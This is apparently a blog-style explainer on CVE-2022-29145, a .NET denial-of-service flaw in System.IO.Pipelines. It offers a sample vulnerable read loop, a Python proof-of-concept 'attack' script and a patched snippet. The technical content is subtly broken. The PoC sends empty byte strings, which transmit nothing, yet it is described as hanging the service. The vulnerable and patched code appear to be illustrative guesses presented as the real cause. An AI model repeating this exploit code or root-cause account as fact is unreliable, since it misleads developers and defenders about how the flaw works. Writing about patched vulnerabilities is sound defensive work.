In 2022, Microsoft patched a nasty vulnerability tracked as CVE-2022-29145. If you work with .NET or Visual Studio, it’s important to know what this issue was, how it could be triggered, and what made it stand out compared to similar vulnerabilities like CVE-2022-23267 and CVE-2022-29117. This article will break things down in plain language, walk through the cause, show sample code, and link you straight to the official resources.
What is CVE-2022-29145?
CVE-2022-29145 is a Denial of Service (DoS) bug that affected the .NET runtime and Visual Studio. Unlike security flaws that let hackers steal data or run malicious code, a Denial of Service bug lets an attacker make the software crash, hang, or become unusable. In this case, certain specially crafted requests could cause .NET applications — or Visual Studio itself — to stop working until the machine or process is restarted.
Microsoft’s official advisory:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29145
It occurred when handling certain malformed or malicious input.
- The result could be an infinite loop or resource exhaustion, making the app or environment freeze.
Only affects apps processing untrusted input, like an API, web service, or background job.
- CVE-2022-29145 is unique — it does *not* overlap with CVE-2022-23267 or CVE-2022-29117, which target different pipeline use cases.
Example Exploit
Suppose you host a .NET Core Web API that uses the System.IO.Pipelines for high-performance binary data processing, like custom HTTP servers or SignalR. If an attacker sends a malformed payload, it triggers the bug and consumes 100% CPU, leading to a service crash. Here’s a simplified, safe-to-test scenario:
Vulnerable code snippet (before the patch)
using System.IO.Pipelines;
using System.Threading.Tasks;
public async Task ReadPipeAsync(PipeReader reader)
{
while (true)
{
ReadResult result = await reader.ReadAsync();
ReadOnlySequence<byte> buffer = result.Buffer;
// Vulnerability: Assumes buffer is always valid and non-empty
if (buffer.IsEmpty)
{
continue; // Infinite loop if attacker sends empty sequences
}
// Process data (not shown)
reader.AdvanceTo(buffer.End);
if (result.IsCompleted)
{
break;
}
}
}
How an attacker could exploit this
By repeatedly sending empty payloads or malformed frames, the loop never exits, maxing out the CPU or causing the app to freeze.
Proof-of-Concept Attack (Python Script)
Below is a proof-of-concept for demonstration. Only run in an isolated, legal test environment!
import socket
# Replace with your .NET API's address and port
HOST = 'localhost'
PORT = 500
s = socket.socket()
s.connect((HOST, PORT))
# Send an empty payload or a known bad frame repeatably
for _ in range(100):
s.sendall(b'') # Malformed/empty by design
# Wait or repeat as needed
s.close()
This simple attacker code spams the target with empty data, which, with the vulnerability present, would tie up the target service.
## How To Fix / Patch
- Upgrade to the latest patched version of .NET
- Official Microsoft Security Update Guidance
Patched code sample
if (buffer.IsEmpty && result.IsCompleted)
{
break;
}
// Otherwise, skip or handle empty data gracefully
Additional References
- Microsoft CVE Database: CVE-2022-29145
- GitHub .NET Security Updates
- NVD Entry for CVE-2022-29145
Key Takeaways
- CVE-2022-29145 was a DoS flaw in .NET/Visual Studio tied to System.IO.Pipelines.
Patch immediately; always validate untrusted input in server applications.
Remember: Modern .NET is powerful, but even high-performance code can become an Achilles heel if it assumes the best about input. Stay patched and never trust what you read off the wire!
Timeline
Published on: 05/10/2022 21:15:00 UTC
Last modified on: 05/21/2022 04:16:00 UTC